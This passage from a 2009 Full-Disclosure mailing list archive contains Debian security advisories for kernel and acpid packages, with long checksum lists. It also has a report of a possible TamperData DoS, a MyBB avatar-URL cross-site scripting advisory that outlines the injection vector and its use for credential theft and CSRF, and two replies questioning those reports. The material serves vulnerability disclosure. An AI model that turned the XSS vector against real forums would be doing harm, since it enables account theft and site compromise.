(HP PA RISC) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb Size/MD5 checksum: 261644 7c1852bbe840ac3d90c12d452e2681cf http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_hppa.deb Size/MD5 checksum: 82016 293d2bba2cb8563e700377ada35f2ba2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb Size/MD5 checksum: 259304 f3db74269efbac5501598e35a462bf20 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.8etch1_hppa.deb Size/MD5 checksum: 82038 bdae604446c924296cd1aac5b9be7e95 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch1_hppa.deb Size/MD5 checksum: 13332816 5d9819ffa069392df46ad94e193cbdf1 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch1_hppa.deb Size/MD5 checksum: 258452 c1a9dde9f1c92b4563126d1937d4eec2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch1_hppa.deb Size/MD5 checksum: 14385162 6cbd8dc0702e5cb15237d246883dd2c0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch1_hppa.deb Size/MD5 checksum: 258378 4a864d5f74cd4f1e05362aa00e94236a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb Size/MD5 checksum: 14847618 ab5989ffb84c1780ba7a8d06ac501f67 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_hppa.deb Size/MD5 checksum: 3439250 22ebf43e46ee15c1240d6881c2554248 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb Size/MD5 checksum: 13845394 731ba27a151e94071c8f64ceb0da9e92 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch1_i386.deb Size/MD5 checksum: 360908 aef486d9faf9aca0e61ea01e16d0cbc8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch1_i386.deb Size/MD5 checksum: 19348860 15a2e2dc1fa2b3b423d3010272f7f3f6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_i386.deb Size/MD5 checksum: 82124 ee99a97dc91f3c2e205bce0b901904c0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch1_i386.deb Size/MD5 checksum: 359834 d80f275632e07acaaa02679eee976bb6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.8etch1_i386.deb Size/MD5 checksum: 82160 07df09b3f1af03cd0f20d2b0cf2b679a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_i386.deb Size/MD5 checksum: 347518 a3530c65c732ef54f207a3551c85ec9f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch1_i386.deb Size/MD5 checksum: 19344944 28d8879c242e0698ee8524d006970445 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch1_i386.deb Size/MD5 checksum: 361402 3bad41e46bd717ebe8d15e0473f130eb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_i386.deb Size/MD5 checksum: 19589084 a8319258d3194cd59fa263a1b66a5626 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch1_i386.deb Size/MD5 checksum: 19278254 608362b1503eb3ec838bd01152d7aa93 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_i386.deb Size/MD5 checksum: 3647296 a6ce4748c3fefd49a40ebbfed1e004f9 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch1_ia64.deb Size/MD5 checksum: 318210 76ad07637a2fac8a32d827c23f893ffa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch1_ia64.deb Size/MD5 checksum: 32025152 eb4eec0df149a61e18ae22ef8c50eb43 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch1_ia64.deb Size/MD5 checksum: 318482 a155708aa4e74d90e54a4f107221c995 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_ia64.deb Size/MD5 checksum: 3567324 0e1d20a7ecbf444ad6aba30cc169963d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_ia64.deb Size/MD5 checksum: 82000 f66623c2c53891b0d92055fb032d0592 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch1_ia64.deb Size/MD5 checksum: 32206190 62738a79d48dffcad324124d2b73f3d4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.8etch1_ia64.deb Size/MD5 checksum: 82028 6aa864922de84ad84cfff13eb9ce71ee mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 308452 f5d33880c20e98b12a9ad5ef53743910 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 214502 a39b0ecffd3a215979f8e5bcdcd78bfe http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 17166576 38a62721888bbb2f0fc4d7fbdba70c9e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 82062 3aa3ea6a854d046759d5824257e47bf3 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 17151594 603b866be5168c042bbef832eb253c9d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 10522386 725913ed966df3029d3f72332af590fd http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 225228 e8ad107d20c67c798cdb093ae150592c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 246218 69eee0d55e37c414da07e70b90c190a9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 11957416 9d75b25a0668735d4bfb1fac77788723 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 27772372 307325283c10af9dd6dc8cb4f0de39a7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 246310 815dfe8f02f354f03f0d63f8605bedd9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 22150880 d183f2a93f59d18034573fd7febf5e22 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 3803446 4448552a0dd930e3d51a800c1d6deb50 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 82008 871aace093a3411d3d01dfcc19e57a7a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb Size/MD5 checksum: 309908 ebc141db56c3f149eaf265af89054e03 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 3803432 926f0974edf97ded8ef4bd4f99847b35 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 245716 9a62f6221f1b1e36c8b397e5afcb966a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 82060 401c4c5fb02f54a0deacef21bf630b0e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 26982892 39032aaca4b2a6cecc7091022a42e2b7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 16629962 874a967e72aa10398626267cb2d5ba54 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 21732318 7819062b50720a60a098d086978298ea http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 82012 06886337047db3ad1df77cc919c4cff6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 246190 ec4b8f66e8a0065d694f990745049e7e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 16566324 d778d8f7f199e49cb087fafaef7eb551 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 13316760 aadc4a462ca185163c902551556c92f6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 309226 44e7866afb834db0bf71a9d034d729ba http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 308360 e53f7681e10aa6b07d1ea3e3b58622da http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mipsel.deb Size/MD5 checksum: 245984 a572ee84ea19bb4bb908e6c20a56ca37 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch1_powerpc.deb Size/MD5 checksum: 19194974 99103ae37f6001139ea44dd31f84183f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch1_powerpc.deb Size/MD5 checksum: 320916 0ba37f3d80f38b92b9097ea7e90fb3e7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch1_powerpc.deb Size/MD5 checksum: 320840 0ab836295bc998d5b54f9d54bb2bd23c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch1_powerpc.deb Size/MD5 checksum: 19485870 bbee80ba2e47827a9f8ac2360ccf9e68 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_powerpc.deb Size/MD5 checksum: 3672412 4ff49fe861ab4f49eec95d425114c349 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_powerpc.deb Size/MD5 checksum: 82012 03d29f46bdcab8bab20d237a294fc242 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch1_powerpc.deb Size/MD5 checksum: 295058 7718f3ba536f4af7252961bbbbab24be http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch1_powerpc.deb Size/MD5 checksum: 21169748 db5e60f6e3ba1fcd12a793fd30f75c14 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch1_powerpc.deb Size/MD5 checksum: 17459470 60369530c57a669b6c9bcd441f757417 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch1_powerpc.deb Size/MD5 checksum: 322436 779ccace55f22bdcf1ccd9212033b58d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.8etch1_powerpc.deb Size/MD5 checksum: 82046 39a3cbedcbc4e13f997b7641394e3ad0 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.8etch1_s390.deb Size/MD5 checksum: 1501738 7bf06e1f51092c18b512045444fba8e9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch1_s390.deb Size/MD5 checksum: 193848 6713da5dfd8696c27718075e6cb3fa03 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.8etch1_s390.deb Size/MD5 checksum: 82016 1668a7a797859f5d9e0a7af2ba1781b4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch1_s390.deb Size/MD5 checksum: 6950110 9f8a8d765c71aaee7e94402626f413a1 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_s390.deb Size/MD5 checksum: 82002 0f37b246336adf27ce4d37776257ff95 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch1_s390.deb Size/MD5 checksum: 7200396 de8ace94802f259aef088e9384a4ca6b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch1_s390.deb Size/MD5 checksum: 194084 ea695f010b1916d50f1bdad2e85dd1f0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_s390.deb Size/MD5 checksum: 3429706 8a40f944fa6b7c64353d76154bded277 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.8etch1_sparc.deb Size/MD5 checksum: 82152 88b0f93df760ac992f30c1927d0144f7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_sparc.deb Size/MD5 checksum: 3652306 42dda4de967328363df86bee8ba0c53b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch1_sparc.deb Size/MD5 checksum: 13022916 93538efd19eae1488128df8a3a73b957 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch1_sparc.deb Size/MD5 checksum: 263066 c796e2fd4e51ff6a66d9eec594c81386 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch1_sparc.deb Size/MD5 checksum: 13317632 e50f9515e67c38d66c58f317bf2c9292 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch1_sparc.deb Size/MD5 checksum: 264930 a1d0ba75ee8eded18b4d97327ebd0291 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_sparc.deb Size/MD5 checksum: 82128 6c1ebe596b196e25cb0307f78ab1f358 These changes will probably be included in the oldstable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJ/JE8huANDBmkLRkRAlzXAJwJvkPuUoKwLYQPFVnF7t2DRIkzjQCgg8zC w+zXZAH5HPrUZ78bMIHk8Sw= =KhiR -----END PGP SIGNATURE----- From xiashing at gmail.com Fri May 1 14:59:35 2009 From: xiashing at gmail.com (Xia Shing Zee) Date: Fri, 1 May 2009 23:59:35 +1000 Subject: [Full-disclosure] Possible DoS in TamperData Add-on v10.1.0 for FireFox 3.0.8 Message-ID: <954b158e0905010659id28f81au3e3baec5d0cf17a0@mail.gmail.com> Not sure about this, but it seems possible to DoS TamperData and subsequently Firefox by uploading large files and running TamperData at the same time. ======================================================================= Possible DoS in TamperData Add-on v10.1.0 for FireFox 3.0.8 ======================================================================= Tested on: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729) ======================================================================= !description The loop tries to constantly read the streaming HTTP data. Firefox will become unresponsive and will offer the user to stop the script. The script can be continued, but with files over 8.00mb there is a possible DoS, as the script must constantly be 'continued'. ======================================================================= !vulnerable Line 482: chrome://tamperdata/content/tamperdata.js var postString = ""; try { // This is to avoid 'NS_BASE_STREAM_CLOSED' exception that may occurs // See bug #188328. for (var i = 0; i < size; i++) { var c = this.stream.read(1); c ? postString += c : postString+='\0'; } ======================================================================= !steps to reproduce error Load tamper data, it does not have to be in "Start tampering mode". Upload a binary file to a website that is between 4200kb and 4230kb. ======================================================================= !solution None available. ======================================================================= !author Xia Shing Zee ======================================================================= -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090501/81d9f45f/attachment.html From white at debian.org Sat May 2 02:52:49 2009 From: white at debian.org (Steffen Joeris) Date: Sat, 2 May 2009 11:52:49 +1000 (EST) Subject: [Full-disclosure] [SECURITY] [DSA 1786-1] New acpid packages fix denial of service Message-ID: <20090502015249.C99B484864B@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1786-1 security at debian.org http://www.debian.org/security/ Steffen Joeris May 02, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : acpid Vulnerability : denial of service Problem type : remote Debian-specific: no CVE Id : CVE-2009-0798 It was discovered that acpid, a daemon for delivering ACPI events, is prone to a denial of service attack by opening a large number of UNIX sockets, which are not closed properly. For the stable distribution (lenny), this problem has been fixed in version 1.0.8-1lenny1. For the oldstable distribution (etch), this problem has been fixed in version 1.0.4-5etch1. For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 1.0.10-1. We recommend that you upgrade your acpid packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.4.orig.tar.gz Size/MD5 checksum: 23416 3aff94e92186e99ed5fd6dcee2db7c74 http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.4-5etch1.dsc Size/MD5 checksum: 623 5bdf431edd68f502a269c3ed93023416 http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.4-5etch1.diff.gz Size/MD5 checksum: 12446 97300b3586c815e0954b8dbd4eea7aa2 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.4-5etch1_amd64.deb Size/MD5 checksum: 28616 626f43fa08946939e3d44092c30e8538 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.4-5etch1_i386.deb Size/MD5 checksum: 25372 7c0e2c68816e6ddb5d1e2ac0ae7f5580 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.4-5etch1_ia64.deb Size/MD5 checksum: 33650 e12d65573422a71a5529587543601146 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.8-1lenny1.diff.gz Size/MD5 checksum: 18689 bad776513fe975f1d028d605be805be3 http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.8-1lenny1.dsc Size/MD5 checksum: 1289 6f9dc2ce42fbcd28d217f0208cdfd566 http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.8.orig.tar.gz Size/MD5 checksum: 25308 ee48ff966292ec517ba83b37dd0a3256 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.8-1lenny1_amd64.deb Size/MD5 checksum: 37898 27be010a11b42cf1a92cced7f09dfc8b i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.8-1lenny1_i386.deb Size/MD5 checksum: 35596 4638a7439832ecdc869e592c6066ea4b ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/a/acpid/acpid_1.0.8-1lenny1_ia64.deb Size/MD5 checksum: 42846 1046165b9c0cdcdb9021375179279b2d These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkn7ptwACgkQ62zWxYk/rQcCpwCfQatV3Lveg6siCmSx+JFvK58V 8cMAn0bx3TjrqRbhpx3TVoGf9oG2BIy6 =sME5 -----END PGP SIGNATURE----- From jacquescopeau at googlemail.com Sun May 3 13:01:28 2009 From: jacquescopeau at googlemail.com (Jacques Copeau) Date: Sun, 3 May 2009 14:01:28 +0200 Subject: [Full-disclosure] =?windows-1252?q?=93Cross-Site_Scripting=94_vul?= =?windows-1252?q?nerability_in_MyBB_1=2E4=2E5?= Message-ID: <6aade7300905030501h5d3d62fdl5434c3b9027c980b@mail.gmail.com> Advisory : ?Cross-Site Scripting? vulnerability in MyBB Application: MyBB Vulnerable Versions: <= 1.4.5 Reported By: Jacques Copeau Description *********** MyBB is a forum package full of useful and to-the-point features, helping you to make administrating your bulletin board as easy as possible. We highlighted some of MyBB's best capabilities, to show you why you should choose MyBB over any other discussion board. Details ******* MyBB suffers from failure to properly sanitize user input, resulting in cross-site-scripting vulnerabilities. By entering malicious scripts into the Avatar URL field in the user control panel, attackers can steal login credentials, attack user pcs, manipulate board settings and even to introduce malicious php scripts into the board. http://yourdomain.com/somefile.png?"> http://yourdomain.com/somefile.png must be a valid link to an image file meeting the board settings for avatars. Discussion ******* The XSS renders in all browsers and on various pages inside the myBB software. We consider it to be particularly grave, as it renders on the ACP user overview page; this can be easily exploited to construct a universal CSRF vulnerability that introduces malicious php code into the script. Fix Information *************** Update to MyBB 1.4.6 Note *************** This vulnerability was discovered as part of a survey, which will be released at a later date. Timeline: *********** April 29th 2009: Contacted Vendor April 30th 2009: Vendor reaction: "bogus" April 30th 2009: Vendor corrects statement May 3rd 2009: Patch released May 3rd 2009: Full Disclosure References: *********** http://www.mybboard.net/ From Valdis.Kletnieks at vt.edu Sun May 3 21:44:28 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Sun, 03 May 2009 16:44:28 -0400 Subject: [Full-disclosure] Possible DoS in TamperData Add-on v10.1.0 for FireFox 3.0.8 In-Reply-To: Your message of "Fri, 01 May 2009 23:59:35 +1000." <954b158e0905010659id28f81au3e3baec5d0cf17a0@mail.gmail.com> References: <954b158e0905010659id28f81au3e3baec5d0cf17a0@mail.gmail.com> Message-ID: <159248.1241383468@turing-police.cc.vt.edu> On Fri, 01 May 2009 23:59:35 +1000, Xia Shing Zee said: > The loop tries to constantly read the streaming HTTP data. Firefox will > become unresponsive and will offer the user to stop the script. > The script can be continued, but with files over 8.00mb there is a > possible DoS, as the script must constantly be 'continued'. http://tamperdata.mozdev.org/warnings.html says: # Request/Response pairs are stored in javascript arrays. Run this extension for a long time any firefox may run out of memory - don't do this Sounds like it's probably a known issue - you run long enough, those javascript arrays are gonna get big and piggy, and trigger the "stop the script" warning. Or can you verify that you're seeing some different issue? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090503/7fd5ff0f/attachment.bin From andfarm at gmail.com Sun May 3 22:19:39 2009 From: andfarm at gmail.com (Andrew Farmer) Date: Sun, 3 May 2009 14:19:39 -0700 Subject: [Full-disclosure] =?windows-1252?q?=93Cross-Site_Scripting=94_vul?= =?windows-1252?q?nerability_in_MyBB_1=2E4=2E5?= In-Reply-To: <6aade7300905030501h5d3d62fdl5434c3b9027c980b@mail.gmail.com> References: <6aade7300905030501h5d3d62fdl5434c3b9027c980b@mail.gmail.com> Message-ID: <703DBC17-8619-4EA3-BA22-F79D1A765D54@gmail.com> On 03 May 09, at 05:01, Jacques Copeau wrote: > Advisory : ?Cross-Site Scripting? vulnerability in MyBB > The XSS renders in all browsers and on various pages inside the myBB > software. > We consider it to be particularly grave, as it renders on the ACP > user overview > page; this can be easily exploited to construct a universal CSRF > vulnerability > that introduces malicious php code into the script. So, er, is this vulnerability XSS, CSRF, or RCE? Pick one and stick with it. From my_first_name_here at teusink.net Sun May 3 22:27:56 2009 From: 